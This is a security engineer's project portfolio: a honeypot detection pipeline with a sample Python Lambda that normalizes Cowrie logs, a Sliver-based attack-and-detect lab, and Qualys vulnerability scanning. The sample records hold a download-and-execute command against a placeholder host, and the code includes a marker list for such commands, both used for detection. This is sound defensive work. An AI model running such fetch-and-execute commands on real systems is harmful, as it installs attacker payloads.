My Projects

Project Sentinel
  • Designed and deployed a cloud-native SOC-in-a-box using AWS, capturing real-world attacker sessions and generating actionable threat intelligence.

  • Built a real-time detection pipeline (CloudWatch → Lambda → OpenSearch) to normalize logs, enrich events, reduce noise, and store curated alerts for threat analysis.

  • Developed Apache Airflow security workflows for daily vulnerability management, CVE/asset correlation, risk-based prioritization, and IOC feed ingestion.

  • Implemented AI-assisted analysis to summarize attacker activity, extract IOCs, classify behavior, and support triage with contextual insight.

  • Created automation pipelines for CSV reporting, email summaries, and structured outputs consumable by SOC analysts and SIEM tools.

  • Integrated Cowrie and Suricata to detect brute-force attempts, malicious payloads, and exploitation traffic, producing attacker-derived intelligence.

  • Reduced SIEM storage costs by 50–70% via Lambda filtering and tiered S3 Glacier retention without losing forensic value.

  • Delivered dashboards, scripts, and orchestrated workflows demonstrating modern SOC engineering, detection logic, threat intel, and automation skills.
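The normalize-filter-enrich stage of a CloudWatch → Lambda → OpenSearch pipeline like the one listed above, as an added example written for this page (it is not Project Sentinel's own code). It assumes Cowrie's JSON log is forwarded through a CloudWatch Logs subscription filter, whose payload arrives gzip-compressed and base64-encoded under `awslogs.data`; the OpenSearch bulk-indexing step is left out and the handler returns the curated documents it would index. The keep-list, the scanner address and the sample records are all constructed for illustration.

```python
"""Added example: CloudWatch Logs subscription -> Lambda normalize/filter stage.

Illustrative code for this page, not Project Sentinel's implementation.
Assumes Cowrie JSON records as input; OpenSearch indexing is omitted.
"""
import base64
import gzip
import json
from typing import List, Optional

# Cowrie event types worth keeping for triage. Everything else (connect,
# client banners, kex negotiation, session close) is dropped before it
# ever reaches the index, which is where the storage savings come from.
KEEP_EVENTS = {
    "cowrie.login.failed",
    "cowrie.login.success",
    "cowrie.command.input",
    "cowrie.session.file_download",
}

# Constructed assumption: an internal vulnerability scanner whose probes
# are known noise and should not be stored as attacker activity.
SCANNER_SOURCES = {"10.0.0.5"}

# Substrings that mark the classic download-and-execute pattern after a
# successful brute force; used only to tag events for analysts.
DOWNLOAD_EXEC_MARKERS = ("wget ", "curl ", "chmod +x")


def normalize(raw: dict) -> Optional[dict]:
    """Map one Cowrie JSON record onto a flat schema; None means drop it."""
    event_id = raw.get("eventid", "")
    src = raw.get("src_ip")
    if event_id not in KEEP_EVENTS or src in SCANNER_SOURCES:
        return None
    doc = {
        "@timestamp": raw.get("timestamp"),
        "event_type": event_id,
        "src_ip": src,
        "session": raw.get("session"),
        "sensor": raw.get("sensor"),
    }
    if event_id.startswith("cowrie.login"):
        doc["username"] = raw.get("username")
        doc["password"] = raw.get("password")
        doc["outcome"] = "success" if event_id.endswith("success") else "failure"
    elif event_id == "cowrie.command.input":
        cmd = raw.get("input", "")
        doc["command"] = cmd
        doc["tags"] = ["download_exec"] if any(m in cmd for m in DOWNLOAD_EXEC_MARKERS) else []
    elif event_id == "cowrie.session.file_download":
        doc["url"] = raw.get("url")
        doc["sha256"] = raw.get("shasum")
    return doc


def decode_subscription_event(event: dict) -> List[dict]:
    """Unpack the gzip+base64 payload a CloudWatch Logs subscription filter
    delivers and parse each log line as JSON (non-JSON lines are skipped)."""
    payload = gzip.decompress(base64.b64decode(event["awslogs"]["data"]))
    records = []
    for entry in json.loads(payload).get("logEvents", []):
        try:
            records.append(json.loads(entry["message"]))
        except (json.JSONDecodeError, KeyError, TypeError):
            continue
    return records


def handler(event: dict, context=None) -> dict:
    """Lambda entry point: decode, normalize, drop noise, return curated docs.
    A production handler would bulk-index `docs` into OpenSearch here."""
    records = decode_subscription_event(event)
    docs = [d for d in (normalize(r) for r in records) if d is not None]
    return {"received": len(records), "indexed": len(docs), "docs": docs}


def make_test_event(records: List[dict]) -> dict:
    """Build a constructed subscription-filter event so the example runs offline."""
    body = {
        "messageType": "DATA_MESSAGE",
        "logGroup": "/sentinel/cowrie",
        "logStream": "honeypot-1",
        "logEvents": [{"id": str(i), "timestamp": 0, "message": json.dumps(r)}
                      for i, r in enumerate(records)],
    }
    data = base64.b64encode(gzip.compress(json.dumps(body).encode())).decode()
    return {"awslogs": {"data": data}}


# Constructed sample records in Cowrie's JSON shape (not real captures).
SAMPLE_RECORDS = [
    {"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:00Z"},
    {"eventid": "cowrie.client.version", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:01Z"},
    {"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:02Z", "username": "root", "password": "123456"},
    {"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:03Z", "username": "root", "password": "admin"},
    {"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:04Z", "input": "wget http://198.51.100.9/x.sh; chmod +x x.sh; ./x.sh"},
    {"eventid": "cowrie.session.file_download", "src_ip": "203.0.113.7", "session": "s1", "sensor": "hp1", "timestamp": "2024-01-01T00:00:05Z", "url": "http://198.51.100.9/x.sh", "shasum": "0" * 64},
    {"eventid": "cowrie.login.failed", "src_ip": "10.0.0.5", "session": "s2", "sensor": "hp1", "timestamp": "2024-01-01T00:00:06Z", "username": "admin", "password": "admin"},
]

if __name__ == "__main__":
    print(json.dumps(handler(make_test_event(SAMPLE_RECORDS)), indent=2))
```

Of the seven constructed records, three are dropped (two session-setup events and one scanner login), so four curated documents reach the index; in a real deployment the dropped events can still be written raw to an S3 bucket with a Glacier lifecycle rule so forensic value is kept without paying hot-storage rates.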

Adversary Simulation & Threat Detection
  • Built a simulated attack environment with a Windows victim endpoint and Ubuntu C2 server running Sliver for malware command-and-control.

  • Developed and executed a custom malware payload, achieving SYSTEM-level privilege escalation on the target. (Red Team)

  • Performed threat hunting by investigating suspicious processes and identifying malicious executables on the compromised host. (Blue Team)

  • Created YARA signatures and LimaCharlie D&R rules to detect and respond to malicious activity. (Blue Team)

  • Tested and validated detection logic, confirming YARA rules effectively detected, scanned, and blocked the malware. (Threat Hunting)

Vulnerability Management Lifecycle
  • Installed and deployed Qualys Virtual Scanner Appliance and accessed it through the Qualys Cloud Platform.

  • Executed the vulnerability management lifecycle in a virtualized environment, comprising the stages of Discovery, Prioritization, Assessment, Reporting, Remediation, and Verification.

  • Leveraged Qualys to manage vulnerability scanning and assessed the identified vulnerabilities.

  • Detected deprecated software on a Windows 10 virtual machine, remediated the vulnerabilities, and verified the software was no longer vulnerable.